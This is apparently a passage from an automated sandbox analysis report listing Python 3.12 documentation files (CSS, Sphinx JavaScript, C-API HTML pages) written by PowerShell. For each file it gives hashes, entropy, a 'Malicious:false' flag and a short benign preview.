                              Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M7.90472 0.00013087C7.24498 0.00316295 6.61493 0.0588153 6.06056 0.15584C4.42744 0.441207 4.13093 1.0385 4.13093 2.14002V3.59479H7.99018V4.07971H4.13093H2.68259C1.56098 4.07971 0.578874 4.7465 0.271682 6.01495C-0.0826595 7.4689 -0.0983765 8.37618 0.271682 9.89434C0.546011 11.0244 1.20115 11.8296 2.32275 11.8296H3.64965V10.0856C3.64965 8.82574 4.75178 7.71441 6.06056 7.71441H9.91531C10.9883 7.71441 11.8449 6.84056 11.8449 5.77472V2.14002C11.8449 1.10556 10.9626 0.328486 9.91531 0.15584C9.25235 0.046687 8.56447 -0.00290121 7.90472 0.00013087ZM5.81767 1.17017C6.2163 1.17017 6.54184 1.49742 6.54184 1.89978C6.54184 2.30072 6.2163 2.62494 5.81767 2.62494C5.41761 2.62494 5.0935 2.30072 5.0935 1.89978C5.0935 1.49742 5.41761 1.17017 5.81767 1.17017Z" fill="url(#paint0_linear)"/>.<path d="M12.3262 4.07971V5.77472C12.3262 7.08883 11.1998 8.19488 9.9153 8.19488H6.06055C5.00466 8.19488 4.13092 9

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\pydoctheme.css

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):13101
                              Entropy (8bit):4.713844241406214
                              Encrypted:false
                              SSDEEP:
                              MD5:2671E5A932CAF4097FD96F2CA64DDAA9
                              SHA1:815ECD07AE7CDFE81E82E7EB93337D8866C5AC60
                              SHA-256:F3AB1CDBEBD0AB51AA0CAEA1D09C6482FF6E58ED596B9E3BAA0FE47B029FEBA6
                              SHA-512:E3B0E633F206FE416BE283B698099C85F1D800D613365A549211339D5C91008E9E2A51D57035B70B896696702C20783C715F619F3F7E6AAE0D63FFB305DD9BAB
                              Malicious:false
                              Reputation:unknown
                              Preview:@import url('classic.css');../* unset some styles from the classic stylesheet */.div.document,.div.body,.div.related,.div.body h1,.div.body h2,.div.body h3,.div.body h4,.div.body h5,.div.body h6,.div.sphinxsidebar a,.div.sphinxsidebar p,.div.sphinxsidebar ul,.div.sphinxsidebar h3,.div.sphinxsidebar h3 a,.div.sphinxsidebar h4,..menu a,..menu p,..menu ul,..menu h3,..menu h3 a,..menu h4,.table.docutils td,.table.indextable tr.cap,.pre {. background-color: inherit;. color: inherit;.}../* Add underlines to links */.a[href] {. text-decoration: underline 1px;.}../* Increase the underline offset for code to avoid obscuring underscores */.a[href]:has(> code) {. text-underline-offset: 0.25em;.}../* No underline for navigation */.a.headerlink,.div.genindex-jumpbox a,.div.modindex-jumpbox a,.div#search-results a,.div.sphinxsidebar a,.div.toctree-wrapper a,.div[role=navigation] a,.table.contentstable a,.table.indextable a {. text-decoration: none;.}../* Except when hovered */.div.gen

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\pydoctheme_dark.css

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):2371
                              Entropy (8bit):5.01984802023824
                              Encrypted:false
                              SSDEEP:
                              MD5:DA320D3DE070F942BDAD563895E7636F
                              SHA1:FD8746DC6D18E076D66AA4C2B6B171056BEEC703
                              SHA-256:84B40EBB0CD283D71C30C96E60FAC3DD9D8C738C813613E99146F4D9AE1874E0
                              SHA-512:2491150B7BDAA4D4693246B25416E2285C43041A45E210777B16B97013544C3B00F7BEEDE4335287D38957BB05C23BA3F5996B3AAC504B7CE76B6F964E2034C6
                              Malicious:false
                              Reputation:unknown
                              Preview:./* Browser elements */.:root {. scrollbar-color: #616161 transparent;. color-scheme: dark;.}..html,.body {. background-color: #222;. color: rgba(255, 255, 255, 0.87);.}..div.related {. color: rgba(255, 255, 255, 0.7); /* classic overwrite */. border-color: #424242;.}../* SIDEBAR */.div.sphinxsidebar, .menu-wrapper {. background-color: #333;. color: inherit;.}..#sidebarbutton {. /* important to overwrite style attribute */. background-color: #555 !important;. color: inherit !important;.}..div.sidebar, aside.sidebar {. background-color: #424242;. border-color: #616161;.}../* ANCHORS AND HIGHLIGHTS */.div.body a {. color: #7af;.}..div.body a:visited {. color: #09e;.}..a.headerlink:hover {. background-color: #424242;.}..div.related a {. color: currentColor;.}..div.footer,.div.footer a {. color: currentColor; /* classic overwrites */.}..dt:target,.span.highlighted {. background-color: #616161;.}...footnote:target {. background-col

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\pygments.css

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4976
                              Entropy (8bit):5.069794660694964
                              Encrypted:false
                              SSDEEP:
                              MD5:0FDF7C5DDE08416916309ED897659073
                              SHA1:351408174FDE3CC5650AF098B603C9B9299DE40B
                              SHA-256:88B3629FD3D7A222217C936818F992B0B6C40DDBB3266B2FA6D56E2A58849B11
                              SHA-512:F276BCC4B4F07BB85B1BD769B3129AE7B37E22B5CE420A058000C7B1F708F4478DF3A84A4896369CC35924A3BAE384FFFF8922ADC937E3828F7F453FEB2F0D1E
                              Malicious:false
                              Reputation:unknown
                              Preview:pre { line-height: 125%; }..td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }..span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }...highlight .hll { background-color: #ffffcc }...highlight { background: #f8f8f8; }...highlight .c { color: #3D7B7B; font-style: italic } /* Comment */...highlight .err { border: 1px solid #FF0000 } /* Error */...highlight .k { color: #008000; font-weight: bold } /* Keyword */...highlight .o { color: #666666 } /* Operator */...highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */...highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */...highlight .cp { color: #9C6500 } /* Comment.Preproc */...h

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\pygments_dark.css

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5139
                              Entropy (8bit):5.001030227512549
                              Encrypted:false
                              SSDEEP:
                              MD5:6BAB1AE2E37B08D2BF857361DD07958C
                              SHA1:D9233B5F65A1EBF333EE431A25FE257117C46899
                              SHA-256:B228D5A2C3B6A621F4D8573F755B74C33345C33A009BDBE0C04B855D656AC7A0
                              SHA-512:93895E3C19A26857AD8955258ABF22A1D04A586D5BF48E04A46094F1545653A671BABFE40B2E0B2DFDCE3E359D8A215906A2A4765A9B62435AF88C6EDF50B3D9
                              Malicious:false
                              Reputation:unknown
                              Preview:pre { line-height: 125%; }..td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }..span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }...highlight .hll { background-color: #49483e }...highlight { background: #272822; color: #f8f8f2 }...highlight .c { color: #959077 } /* Comment */...highlight .err { color: #ed007e; background-color: #1e0010 } /* Error */...highlight .esc { color: #f8f8f2 } /* Escape */...highlight .g { color: #f8f8f2 } /* Generic */...highlight .k { color: #66d9ef } /* Keyword */...highlight .l { color: #ae81ff } /* Literal */...highlight .n { color: #f8f8f2 } /* Name */...highlight .o { color: #ff4689 } /* Operator */...highlight .x { color: #f8f8f2 } /

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\search-focus.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):559
                              Entropy (8bit):4.771802759201691
                              Encrypted:false
                              SSDEEP:
                              MD5:E7FFE039348E5AE047B97F246579B381
                              SHA1:301A4DD0FA54530684DE7CC7A863D27C449BA43C
                              SHA-256:0F0595EF5B2C2AFAF36A03DE9CFEF22EF15009DCAA1498AB6C19353C546F5680
                              SHA-512:A6FF347A7C874B322922C63FE1385615C0853E9202B95DF07D891A39032FF830956FBF500387D23C8C190FB14408A20032AD8F2717DE33771C8CE7BFD8AD0775
                              Malicious:false
                              Reputation:unknown
                              Preview:function isInputFocused() {. const activeElement = document.activeElement;. return (. activeElement.tagName === 'INPUT' ||. activeElement.tagName === 'TEXTAREA' ||. activeElement.isContentEditable. );.}..document.addEventListener('keydown', function(event) {. if (event.key === '/') {. if (!isInputFocused()) {. // Prevent "/" from being entered in the search box. event.preventDefault();.. // Set the focus on the search box. const searchBox = document.getElementById('search-box');. searchBox.focus();. }. }.});.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\searchtools.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):18732
                              Entropy (8bit):4.823676806040573
                              Encrypted:false
                              SSDEEP:
                              MD5:98B20BA46411DEEFA7EFA94524097C2C
                              SHA1:641A3FA218CE4DA2A0A8FE282473D041DB73DC15
                              SHA-256:3012A521CA4C32C56939AF6A67E4F4B8F5FB80C2952E19CBF2FCBD697C4BB37D
                              SHA-512:4D6A716824F08F73178BF1694A0949ED18140D28C045FC0FFE14175B2921A3699541236A98ED187B02789D3DE8B4C6228ADAF1E28267EF882F9AF082B26AA263
                              Malicious:false
                              Reputation:unknown
                              Preview:/*. * searchtools.js. * ~~~~~~~~~~~~~~~~. *. * Sphinx JavaScript utilities for the full-text search.. *. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */."use strict";../**. * Simple result scoring code.. */.if (typeof Scorer === "undefined") {. var Scorer = {. // Implement the following function to further tweak the score for each result. // The function takes a result array [docname, title, anchor, descr, score, filename]. // and returns the new score.. /*. score: result => {. const [docname, title, anchor, descr, score, filename] = result. return score. },. */.. // query matches the full name of an object. objNameMatch: 11,. // or matches in the last dotted part of the object name. objPartialMatch: 6,. // Additive scores depending on the priority of the object. objPrio: {. 0: 15, // used to be importantResults. 1: 5, // used to be objectResults. 2: -5,

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\sidebar.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2697
                              Entropy (8bit):4.868494495669144
                              Encrypted:false
                              SSDEEP:
                              MD5:DDE60BA867F1238B1446B2049901C00A
                              SHA1:ED59575D1E84E1B7EA5A1C2CB1C766F32AC3B266
                              SHA-256:99E280C84C96C9B75A134BF0F6AA2978BF1F65B7C72A9360D1CBC74BA54FB20A
                              SHA-512:D14D8D7680F976598F4766C90839A1DBB756F48DF360955F8404F375BC6792C70183C37C0E9DDE305D100CBABD3A8BC3CC1373F2DC9E86582F724D93C0374C53
                              Malicious:false
                              Reputation:unknown
                              Preview:/*.. * sidebar.js.. * ~~~~~~~~~~.. *.. * This file is functionally identical to "sidebar.js" in Sphinx 5.0... * When support for Sphinx 4 and earlier is dropped from the theme,.. * this file can be removed... *.. * This script makes the Sphinx sidebar collapsible... *.. * .sphinxsidebar contains .sphinxsidebarwrapper. This script adds.. * in .sphinxsidebar, after .sphinxsidebarwrapper, the #sidebarbutton.. * used to collapse and expand the sidebar... *.. * When the sidebar is collapsed the .sphinxsidebarwrapper is hidden.. * and the width of the sidebar and the margin-left of the document.. * are decreased. When the sidebar is expanded the opposite happens... * This script saves a per-browser/per-session cookie used to.. * remember the position of the sidebar among the pages... * Once the browser is closed the cookie is deleted and the position.. * reset to the default (expanded)... *.. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE f

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\sphinx_highlight.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text
                              Category:dropped
                              Size (bytes):5123
                              Entropy (8bit):4.925223498348649
                              Encrypted:false
                              SSDEEP:
                              MD5:0CD5EF6415C4AF33C6FAF75B54102CF5
                              SHA1:7C8A5B8F897ED4E84ACD956218BEC2216F37C088
                              SHA-256:096231E9C87DF80EC3273DA9C5B71BC81503206726A07A4DD4DE44C256FF859C
                              SHA-512:809358B719AD7F27439E2302E04508A9DBE8CF39723CEF45D3057B23D5673A4024B65B7758A69B49AABF807C1F1A42930874468A7AFBA5539776491049EBF4A7
                              Malicious:false
                              Reputation:unknown
                              Preview:/* Highlighting utilities for Sphinx HTML documentation. */."use strict";..const SPHINX_HIGHLIGHT_ENABLED = true../**. * highlight a given string on a node by wrapping it in. * span elements with the given class name.. */.const _highlight = (node, addItems, text, className) => {. if (node.nodeType === Node.TEXT_NODE) {. const val = node.nodeValue;. const parent = node.parentNode;. const pos = val.toLowerCase().indexOf(text);. if (. pos >= 0 &&. !parent.classList.contains(className) &&. !parent.classList.contains("nohighlight"). ) {. let span;.. const closestNode = parent.closest("body, svg, foreignObject");. const isInSVG = closestNode && closestNode.matches("svg");. if (isInSVG) {. span = document.createElementNS("http://www.w3.org/2000/svg", "tspan");. } else {. span = document.createElement("span");. span.classList.add(className);. }.. span.appendChild(document.createTextNode(val.substr(pos, text.

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_static\themetoggle.js

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):779
                              Entropy (8bit):4.698991607713142
                              Encrypted:false
                              SSDEEP:
                              MD5:4B5EEF9423B62E66EB345DC601BFC288
                              SHA1:5ED1C79C5A3573B233A74D344D2E2A720D433B5B
                              SHA-256:E83D4B134C20F038CF3FBEFAFCAC4F0B15DD224FA0189257E436291C52C6D54C
                              SHA-512:28D938C7308522E2BE6BEFD230FC74CE7119C0DEFC3054951DF529412CC143C94D62FEAF1643DF0F55EB92A9992775184211425057CD5A470253136A4054CB30
                              Malicious:false
                              Reputation:unknown
                              Preview:const pydocthemeDark = document.getElementById('pydoctheme_dark_css').const pygmentsDark = document.getElementById('pygments_dark_css').const themeSelectors = document.getElementsByClassName('theme-selector')..function activateTheme(theme) {. localStorage.setItem('currentTheme', theme);. [...themeSelectors].forEach(e => e.value = theme). switch (theme) {. case 'light':. pydocthemeDark.media = 'not all'. pygmentsDark.media = 'not all'. break;. case 'dark':. pydocthemeDark.media = 'all'. pygmentsDark.media = 'all'. break;. default:. // auto. pydocthemeDark.media = '(prefers-color-scheme: dark)'. pygmentsDark.media = '(prefers-color-scheme: dark)'. }.}..activateTheme(localStorage.getItem('currentTheme') || 'auto').

                              C:\Users\user\Downloads\Python\Python312\Doc\html\about.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):14755
                              Entropy (8bit):4.825013643605692
                              Encrypted:false
                              SSDEEP:
                              MD5:6DECA5ED947F3B43B2088EB4CB82B47C
                              SHA1:B0F6E8E262153DDDAD5EBCAC82A1DD6419BC5904
                              SHA-256:C4B77A791522911C51966D765048CE9716580E6212E39AC95B359BF785EA3E40
                              SHA-512:8DA915C66A2A346FC948A1B8FECD69BEEABB948C24A48DCAEA4AF0A99361392F69D10329540BFAE7A4CD147B95ADF46E6CA0BF4D0CE38F9C7CA8342C6E0D0565
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="About these documents" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/about.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These documents are generated from reStructuredText sources by Sphinx, a document processor specifically written for the Python documentation. Development of the documentation and its toolchain is ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These documents are generated from reStructuredText sources by Sphinx,

                              C:\Users\user\Downloads\Python\Python312\Doc\html\bugs.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19744
                              Entropy (8bit):4.88174789711368
                              Encrypted:false
                              SSDEEP:
                              MD5:194ECA6A70F0693649A0C17564B5A6C8
                              SHA1:9D67F7A4F04AC3DCBAC0C9A77FFE37DC83B11C7B
                              SHA-256:45E1E40288B4098D792AEE858152016A3FDED0AF79B7FD78912B65E411477CAB
                              SHA-512:0D9418EB1C55DF587A582E00339BDED3648CECDFAD4793F78A3D4B2E4AF4AC36C09302A8DBB745673361D85523955113FFFDD1731FA93494A7848756C8129B60
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Dealing with Bugs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/bugs.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python is a mature programming language which has established a reputation for stability. In order to maintain this reputation, the developers would like to know of any deficiencies you find in Pyt..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python is a mature programming language which has established a reputation

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\abstract.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):16603
                              Entropy (8bit):4.856697584687944
                              Encrypted:false
                              SSDEEP:
                              MD5:57170BC017FABA6BAA30E47676F0B82F
                              SHA1:5545C292125A4F2057213D2B0024FD4738AB4CDF
                              SHA-256:CB71F3FCCCB711792D6CDCEC50FF1D523FA3AE0B8B76B9973E66452C5E7A84A6
                              SHA-512:61849E81416B07B31B3F11B7E3DA712F0ECA8DE92E2F13848B048D38E910F0983739B1E7AC4C0F97E8AA9E23BA72713CFFCBE60414C4F08A8DC4DBF283D6401C
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Abstract Objects Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/abstract.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter interact with Python objects regardless of their type, or with wide classes of object types (e.g. all numerical types, or all sequence types). When used on object type..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter interact with Python objects

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\allocation.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1254), with CRLF line terminators
                              Category:dropped
                              Size (bytes):23547
                              Entropy (8bit):4.905608536545633
                              Encrypted:false
                              SSDEEP:
                              MD5:BD845DBEED53B8C79994EB0FA130C66D
                              SHA1:F97B5C0B18C05805EA447692BC7A53F8B6C6149A
                              SHA-256:894F17F9D88D1D25D968CF1240D950FBE7C92B6E31640D1BA2670DC1A5FBA83D
                              SHA-512:B89B4A4D1CA716F73FA2D34024B9AED86606D6FFE1543140C39779F27FA9D991B1A2AF66B51A75E3A72F52A2F55BDB41F897981AF4369BACC8AC744220054E7C
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Allocating Objects on the Heap" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/allocation.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Allocating Objects on the Heap &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="st

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\apiabiversion.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (423), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20544
                              Entropy (8bit):4.946657739990355
                              Encrypted:false
                              SSDEEP:
                              MD5:3795D5DB681C6B3E5025F2C3DF00DD01
                              SHA1:0539C578532C3DB3C44CE08EDF57CD386E288AEA
                              SHA-256:5C5BB14B151D7EF802500A8AE3BE4285E929A88D096733EE930228BB1DB0803D
                              SHA-512:B218C957BDB79D9592297AB3499093448C90A5A07989D9E7B1C8964DAB4C8C30413017F2DB4B176D0108EB509365B8CE1570522DB478048D5164D7697339246F
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="API and ABI Versioning" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/apiabiversion.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="CPython exposes its version number in the following macros. Note that these correspond to the version code is built with, not necessarily the version used at run time. See C API Stability for a dis..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="CPython exposes its version number in the following ma

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\arg.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1573), with CRLF line terminators
                              Category:dropped
                              Size (bytes):105280
                              Entropy (8bit):4.817954471982983
                              Encrypted:false
                              SSDEEP:
                              MD5:75E56C71F8C49F3EFB2973D14F1B8D93
                              SHA1:AFB958E3408E1D5BB1422F55F40B24C54F28076F
                              SHA-256:8A7E2FFC0F44AAFD08D9C7DE0D5D6428FE2F213AE000F0EB5029437975D94510
                              SHA-512:F880B23EA38720EB35838C46B3AD63DDB14F73A98E805F40F0D1E8C352B5CBC48820EF40C053407751BDE5A93FFC7B4AC0B3375F72AC931248540F23F19DD49F
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Parsing arguments and building values" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/arg.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions are useful when creating your own extensions functions and methods. Additional information and examples are available in Extending and Embedding the Python Interpreter. The first th..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions are useful when creating your own

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\bool.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (602), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19816
                              Entropy (8bit):4.899593946513707
                              Encrypted:false
                              SSDEEP:
                              MD5:18D0469E76ABBA5C1A11ACFFD1A44C5E
                              SHA1:818B16213A1A455B01027492E821AD2C04FE1CBF
                              SHA-256:A86FC96F7D9D4EBB1843FDBE82CC0768E6690505AC7CA57E1C40FB0D3F459DD8
                              SHA-512:AA4FB46254EC452364EFA786318A8B4263C9991122251199321A66644507A14AC1C313B4677D33738DF2AD0956C8F5916AC6EA2B38F721C2AD0AEF2B89E9259C
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Boolean Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bool.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Booleans in Python are implemented as a subclass of integers. There are only two booleans, Py_False and Py_True. As such, the normal creation and deletion functions don.t apply to booleans. The fol..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Booleans in Python are implemented as a subclass of integers. There

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\buffer.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1175), with CRLF line terminators
                              Category:dropped
                              Size (bytes):92164
                              Entropy (8bit):4.893692641705431
                              Encrypted:false
                              SSDEEP:
                              MD5:BB33C1922D336D9F4E9C8AEE33823E3F
                              SHA1:644D2C647EA3DAF536ECF2398D2A9E9430E1D6B3
                              SHA-256:BE7E1A8BAD865FEFE598FF580E201FBAB11F58B1311E296D90F8F0DA97D4C52A
                              SHA-512:8D51A2368050DB668D6AE61A5E396D605657CA6BE4F7CE955AA3653E374C00C1438C76D1C9FB5700479D5A8D808FF1F9A5B7CD0CBF2CC73AC0C98543D084B62F
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Buffer Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/buffer.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Certain objects available in Python wrap access to an underlying memory array or buffer. Such objects include the built-in bytes and bytearray, and some extension types like array.array. Third-part..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Certain objects available in Python wrap access to an underlying mem

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\bytearray.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1010), with CRLF line terminators
                              Category:dropped
                              Size (bytes):27357
                              Entropy (8bit):4.906893227281136
                              Encrypted:false
                              SSDEEP:
                              MD5:4ACAD7ED5DB31641356BB198E7F3580F
                              SHA1:192C71D66259F6B83434019AE6E16F15D540DE30
                              SHA-256:B6D000BABC350B1217DE8ECED27CBCCB91D120B1BAF4D0E233F97456E723A18F
                              SHA-512:2260BB6D0DE1D025F0783CBD98EEC770F8289E489D8619BD33A70EABF933C9FF9F839B49135F390FF697A555531CD81C61F07A0FE802C07B81B56EBD1920E779
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Byte Array Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bytearray.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Type check macros: Direct API functions: Macros: These macros trade safety for speed and they don.t check pointers." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Type check macros: Direct API functions: Macros: These macros trade safety for speed and they don.t check pointers." />..<meta property="og:ima

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\bytes.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1121), with CRLF line terminators
                              Category:dropped
                              Size (bytes):43397
                              Entropy (8bit):4.8909900225739635
                              Encrypted:false
                              SSDEEP:
                              MD5:13B9F6F70BFF2588DDE59CE0E362870C
                              SHA1:BC5C759D19130D72A1E8A9BB61A604298A5CD7DE
                              SHA-256:FB59306ADA4B96802A8C94D003C8767BFAA208D89DDAD00DD7DC18A5637979EC
                              SHA-512:0C076FA73110A98FE5E0715E75BCF565C9A3CA8541DDE6DFA3C27C1EC0F6A3C01629AB18D8D6BA06AABCF4E3A8BF4343F5FDCB9045766E2B68EEEBB2B3DDE7AC
                              Malicious:false
                              Reputation:unknown
